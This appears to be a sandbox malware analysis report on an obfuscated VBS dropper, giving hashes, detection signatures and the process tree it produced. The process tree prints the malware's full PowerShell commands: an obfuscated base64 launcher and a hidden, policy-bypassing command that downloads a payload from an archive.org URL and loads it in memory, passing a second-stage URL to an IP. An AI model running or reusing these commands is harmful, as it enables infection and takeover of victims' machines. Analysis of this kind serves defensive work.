Overview

overview

10

Static

static

1

0x00030000...94.vbs

windows7-x64

10

0x00030000...94.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    12-09-2024 12:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0x000300000000b3e3-94.vbs

  • Size

    194KB

  • MD5

    914253e6225b686ee3e0a752c1cd1bb4

  • SHA1

    42e9ae719f4dfd04e7dcb9d58a911eb37fd3439c

  • SHA256

    00f52a2f56551d868397acd11e4d12c353d7107ce680c6ff00012a90dabc818b

  • SHA512

    92ecf4249ef488d95a657a3e920316cc816e2e8d5d2b8e257e4ce074626beda95d379034c86758ac7a1623354cfe2cba14bf811f73f3a35fe97e3610d85c9e3b

  • SSDEEP

    3072:7tduXlp2G4E2A0w8Vf0DyQPrWDgt5pUGw1piL71OkHiMZzvcqgp3yO9pj2t7tK:JW2Gp9b8tPQPacR9vctpiO9pjGtK

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0x000300000000b3e3-94.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2432
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⛮ ䷖ ⧉ ┕ ⽚B1⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚D0⛮ ䷖ ⧉ ┕ ⽚I⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Gg⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚B0⛮ ䷖ ⧉ ┕ ⽚H⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚cw⛮ ䷖ ⧉ ┕ ⽚6⛮ ䷖ ⧉ ┕ ⽚C8⛮ ䷖ ⧉ ┕ ⽚LwBp⛮ ䷖ ⧉ ┕ ⽚GE⛮ ䷖ ⧉ ┕ ⽚Ng⛮ ䷖ ⧉ ┕ ⽚w⛮ ䷖ ⧉ ┕ ⽚D⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚MQ⛮ ䷖ ⧉ ┕ ⽚w⛮ ䷖ ⧉ ┕ ⽚D⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚LgB1⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚LgBh⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚YwBo⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBl⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚bwBy⛮ ䷖ ⧉ ┕ ⽚Gc⛮ ䷖ ⧉ ┕ ⽚Lw⛮ ䷖ ⧉ ┕ ⽚y⛮ ䷖ ⧉ ┕ ⽚DQ⛮ ䷖ ⧉ ┕ ⽚LwBp⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚ZQBt⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚LwBk⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bh⛮ ䷖ ⧉ ┕ ⽚Gg⛮ ䷖ ⧉ ┕ ⽚LQBu⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚C0⛮ ䷖ ⧉ ┕ ⽚dg⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚EQ⛮ ䷖ ⧉ ┕ ⽚ZQB0⛮ ䷖ ⧉ ┕ ⽚GE⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚BO⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚FY⛮ ䷖ ⧉ ┕ ⽚LgB0⛮ ䷖ ⧉ ┕ ⽚Hg⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Ds⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bi⛮ ䷖ ⧉ ┕ ⽚GE⛮ ䷖ ⧉ ┕ ⽚cwBl⛮ ䷖ ⧉ ┕ ⽚DY⛮ ䷖ ⧉ ┕ ⽚N⛮ ䷖ ⧉ ┕ ⽚BD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚PQ⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚TgBl⛮ ䷖ ⧉ ┕ ⽚Hc⛮ ䷖ ⧉ ┕ ⽚LQBP⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚agBl⛮ ䷖ ⧉ ┕ ⽚GM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚FM⛮ ䷖ ⧉ ┕ ⽚eQBz⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚ZQBt⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚TgBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚LgBX⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚YgBD⛮ ䷖ ⧉ ┕ ⽚Gw⛮ ䷖ ⧉ ┕ ⽚aQBl⛮ ䷖ ⧉ ┕ ⽚G4⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚p⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚R⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚Hc⛮ ䷖ ⧉ ┕ ⽚bgBs⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚YQBk⛮ ䷖ ⧉ ┕ ⽚FM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚By⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚bgBn⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚B1⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚p⛮ ䷖ ⧉ ┕ ⽚Ds⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bi⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚bgBh⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚eQBD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚PQ⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Fs⛮ ䷖ ⧉ ┕ ⽚UwB5⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚G0⛮ ䷖ ⧉ ┕ ⽚LgBD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB2⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚cgB0⛮ ䷖ ⧉ ┕ ⽚F0⛮ ䷖ ⧉ ┕ ⽚Og⛮ ䷖ ⧉ ┕ ⽚6⛮ ䷖ ⧉ ┕ ⽚EY⛮ ䷖ ⧉ ┕ ⽚cgBv⛮ ䷖ ⧉ ┕ ⽚G0⛮ ䷖ ⧉ ┕ ⽚QgBh⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚ZQ⛮ ䷖ ⧉ ┕ ⽚2⛮ ䷖ ⧉ ┕ ⽚DQ⛮ ䷖ ⧉ ┕ ⽚UwB0⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚aQBu⛮ ䷖ ⧉ ┕ ⽚Gc⛮ ䷖ ⧉ ┕ ⽚K⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚k⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚YQBz⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚Ng⛮ ䷖ ⧉ ┕ ⽚0⛮ ䷖ ⧉ ┕ ⽚EM⛮ ䷖ ⧉ ┕ ⽚bwBu⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚ZQBu⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚7⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚YQBz⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚ZQBt⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚B5⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚PQ⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Fs⛮ ䷖ ⧉ ┕ ⽚UgBl⛮ ䷖ ⧉ ┕ ⽚GY⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚GM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bp⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bg⛮ ䷖ ⧉ ┕ ⽚u⛮ ䷖ ⧉ ┕ ⽚EE⛮ ䷖ ⧉ ┕ ⽚cwBz⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bQBi⛮ ䷖ ⧉ ┕ ⽚Gw⛮ ䷖ ⧉ ┕ ⽚eQBd⛮ ䷖ ⧉ ┕ ⽚Do⛮ ䷖ ⧉ ┕ ⽚OgBM⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚YQBk⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bi⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚bgBh⛮ ䷖ ⧉ ┕ ⽚HI⛮ ䷖ ⧉ ┕ ⽚eQBD⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚bgB0⛮ ䷖ ⧉ ┕ ⽚Ck⛮ ䷖ ⧉ ┕ ⽚Ow⛮ ䷖ ⧉ ┕ ⽚k⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚eQBw⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚I⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚9⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚Bh⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚cwBl⛮ ䷖ ⧉ ┕ ⽚G0⛮ ䷖ ⧉ ┕ ⽚YgBs⛮ ䷖ ⧉ ┕ ⽚Hk⛮ ䷖ ⧉ ┕ ⽚LgBH⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚BU⛮ ䷖ ⧉ ┕ ⽚Hk⛮ ䷖ ⧉ ┕ ⽚c⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚JwBS⛮ ䷖ ⧉ ┕ ⽚HU⛮ ䷖ ⧉ ┕ ⽚bgBQ⛮ ䷖ ⧉ ┕ ⽚EU⛮ ䷖ ⧉ ┕ ⽚LgBI⛮ ䷖ ⧉ ┕ ⽚G8⛮ ䷖ ⧉ ┕ ⽚bQBl⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚7⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚bQBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚I⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚9⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚J⛮ ䷖ ⧉ ┕ ⽚B0⛮ ䷖ ⧉ ┕ ⽚Hk⛮ ䷖ ⧉ ┕ ⽚c⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚RwBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚TQBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚K⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚FY⛮ ䷖ ⧉ ┕ ⽚QQBJ⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚7⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚bQBl⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚Bv⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚LgBJ⛮ ䷖ ⧉ ┕ ⽚G4⛮ ䷖ ⧉ ┕ ⽚dgBv⛮ ䷖ ⧉ ┕ ⽚Gs⛮ ䷖ ⧉ ┕ ⽚ZQ⛮ ䷖ ⧉ ┕ ⽚o⛮ ䷖ ⧉ ┕ ⽚CQ⛮ ䷖ ⧉ ┕ ⽚bgB1⛮ ䷖ ⧉ ┕ ⽚Gw⛮ ䷖ ⧉ ┕ ⽚b⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚s⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚WwBv⛮ ䷖ ⧉ ┕ ⽚GI⛮ ䷖ ⧉ ┕ ⽚agBl⛮ ䷖ ⧉ ┕ ⽚GM⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚Bb⛮ ䷖ ⧉ ┕ ⽚F0⛮ ䷖ ⧉ ┕ ⽚XQB⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚Cg⛮ ䷖ ⧉ ┕ ⽚JwB0⛮ ䷖ ⧉ ┕ ⽚Hg⛮ ䷖ ⧉ ┕ ⽚d⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚u⛮ ䷖ ⧉ ┕ ⽚EM⛮ ䷖ ⧉ ┕ ⽚RgBD⛮ ䷖ ⧉ ┕ ⽚E4⛮ ䷖ ⧉ ┕ ⽚Ug⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚DM⛮ ䷖ ⧉ ┕ ⽚O⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚DE⛮ ䷖ ⧉ ┕ ⽚Nw⛮ ䷖ ⧉ ┕ ⽚x⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚MQ⛮ ䷖ ⧉ ┕ ⽚4⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚Mg⛮ ䷖ ⧉ ┕ ⽚x⛮ ䷖ ⧉ ┕ ⽚C4⛮ ䷖ ⧉ ┕ ⽚O⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚5⛮ ䷖ ⧉ ┕ ⽚DE⛮ ䷖ ⧉ ┕ ⽚Lw⛮ ䷖ ⧉ ┕ ⽚v⛮ ䷖ ⧉ ┕ ⽚Do⛮ ䷖ ⧉ ┕ ⽚c⛮ ䷖ ⧉ ┕ ⽚B0⛮ ䷖ ⧉ ┕ ⽚HQ⛮ ䷖ ⧉ ┕ ⽚a⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚L⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚Z⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚YQB0⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBh⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚bw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚L⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚Z⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚YQB0⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBh⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚bw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚C⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚L⛮ ䷖ ⧉ ┕ ⽚⛮ ䷖ ⧉ ┕ ⽚g⛮ ䷖ ⧉ ┕ ⽚Cc⛮ ䷖ ⧉ ┕ ⽚Z⛮ ䷖ ⧉ ┕ ⽚Bl⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚YQB0⛮ ䷖ ⧉ ┕ ⽚Gk⛮ ䷖ ⧉ ┕ ⽚dgBh⛮ ䷖ ⧉ ┕ ⽚GQ⛮ ䷖ ⧉ ┕ ⽚bw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Cw⛮ ䷖ ⧉ ┕ ⽚JwBS⛮ ䷖ ⧉ ┕ ⽚GU⛮ ䷖ ⧉ ┕ ⽚ZwBB⛮ ䷖ ⧉ ┕ ⽚HM⛮ ䷖ ⧉ ┕ ⽚bQ⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Cw⛮ ䷖ ⧉ ┕ ⽚Jw⛮ ䷖ ⧉ ┕ ⽚n⛮ ䷖ ⧉ ┕ ⽚Ck⛮ ䷖ ⧉ ┕ ⽚KQ⛮ ䷖ ⧉ ┕ ⽚=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⛮ ䷖ ⧉ ┕ ⽚','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2176
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$url = 'https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt';$base64Content = (New-Object System.Net.WebClient).DownloadString($url);$binaryContent = [System.Convert]::FromBase64String($base64Content);$assembly = [Reflection.Assembly]::Load($binaryContent);$type = $assembly.GetType('RunPE.Home');$method = $type.GetMethod('VAI');$method.Invoke($null, [object[]]@('txt.CFCNR/38/171.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:328

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    b81f53824c4a845f30d1d096a6d076de

    SHA1

    5368700fcbd8b6e166b0da466bef8556cce6293f

    SHA256

    09ed947228483276a71e1fe0d6774919e1516bd40bcf4a679b3dcc13db217be3

    SHA512

    d67221b34b406a95916186f326874e8b32a0e34f7a458285cc604d3fd6dc6376a1968991bf76550a81bb6439494572ee6bd662f4fe539456eff7435d0c4bf87d

    Download Submit

  • memory/2176-4-0x000007FEF5C7E000-0x000007FEF5C7F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2176-7-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2176-6-0x00000000022E0000-0x00000000022E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2176-5-0x000000001B5A0000-0x000000001B882000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2176-8-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2176-9-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2176-10-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2176-16-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

    Download